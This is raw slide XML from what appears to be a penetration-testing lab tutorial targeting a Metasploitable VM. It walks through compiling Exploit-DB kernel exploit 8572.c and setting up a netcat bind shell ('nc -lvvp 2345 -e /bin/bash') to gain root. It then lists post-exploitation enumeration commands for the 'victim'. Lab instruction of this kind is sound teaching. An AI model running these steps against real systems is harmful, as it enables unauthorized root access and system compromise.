              <a:t>cf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - 8572.c | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>metasploitable_ip_address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4321</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Back in the first tab, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ls -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 8572.c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> to check if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>the file has been transferred </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -o exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8572.c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>-&gt; compile the exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>run cat /proc/net/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>netlink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>to PID of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1"/>
              <a:t>udevd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1"/>
              <a:t>netlink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>. It’s the only non-zero number</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cd /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="409749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ko-KR" dirty="0"/>
              <a:t>Kernel Exploit using Exploit-DB</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75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nano run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>and add below lines in the file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#!/bin/bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nc -lvvp 2345 -e /bin/bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1500" dirty="0"/>
              <a:t>Go back to to home path and run the exploit with the PID </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>./exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>your_PID_number</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>Open a new tab and connect to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1"/>
              <a:t>binded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t> shell with Metasploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>metasploitable_ip_address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2345</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t> (the port number you put in the run file)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>python -c "import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pty;pty.spawn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>('/bin/bash’)”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>Try </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t> to see if you got the root access, (you can see it in the terminal but still)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="de-DE" sz="1500" dirty="0">
              <a:solidFill>
                <a:srgbClr val="EB3C68"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0">
              <a:solidFill>
                <a:srgbClr val="EB3C68"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1170643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After gaining root access…</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75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>Now you got the access to your victim, what should you look for?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Operating System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lsb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-release</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> distribution type</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>cat /proc/version, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>dmesg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> | grep Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> kernel version</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>/profile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>cat ~/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>bashrc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> environmental variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Application &amp; services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> aux | grep root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> services running in root, top  currently running services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>ls -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>alh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>/bin/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> what applications are installed , </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>dpkg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> –l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> more info; version, description..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
